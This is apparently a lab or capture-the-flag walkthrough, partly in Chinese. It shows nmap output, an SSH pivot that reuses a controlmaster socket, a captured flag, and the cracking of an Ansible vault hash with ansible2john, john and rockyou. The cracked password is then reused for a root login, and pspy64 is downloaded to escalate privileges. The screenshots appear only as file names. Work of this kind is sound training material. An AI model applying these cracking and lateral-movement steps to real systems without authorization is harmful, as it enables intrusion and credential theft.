命令:nmap -A -Pn 192.168.243.173

Nmap initial output

Nmap scan report for 192.168.243.173
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE  SERVICE         VERSION
22/tcp   open   ssh             OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 1f:11:e4:0b:3b:8a:e3:12:e9:44:10:7a:c9:64:98:f3 (RSA)
|   256 8a:f7:59:6b:af:db:14:0a:e8:4f:2a:4d:c9:66:04:e7 (ECDSA)
|_  256 d7:cf:21:25:eb:d2:7e:1a:b4:6b:77:41:56:bf:c8:c1 (ED25519)
8081/tcp closed blackice-icecap
8082/tcp closed blackice-alerts
Aggressive OS guesses: Linux 3.11 - 4.1 (93%), Linux 4.4 (93%), Linux 3.16 (90%), Linux 3.13 (90%), Linux 3.10 - 3.16 (88%), Linux 3.10 - 3.12 (88%), Linux 2.6.32 (88%), Linux 3.2 - 3.8 (88%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8082/tcp)
HOP RTT       ADDRESS
-   Hop 1 is the same as for 192.168.243.172
2   205.18 ms 192.168.243.173

192.168.243.172

nottodd@cb2:/home/nottodd/.ssh/controlmaster$ ssh marks@cb3

16.png

获取flag:087fade67b1acec922746aa2694c704d

访问/opt/ansible目录,并查看webserver.yaml文件内容:

17.png

保存上图中红色框中内容,并破解密码:

python3 /usr/share/john/ansible2john.py ansible_webserver.txt > ansible2johnhash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt ansible2johnhash.txt

18.png

继续解密:

19.png

查看/etc/ansible/hosts:

20.png

尝试用获取的密码lifeintheantfarm结合root账户ssh登录192.168.243.171。

尝试对192.168.243.173进行提权,下载pspy64查看进程运行情况:

22.png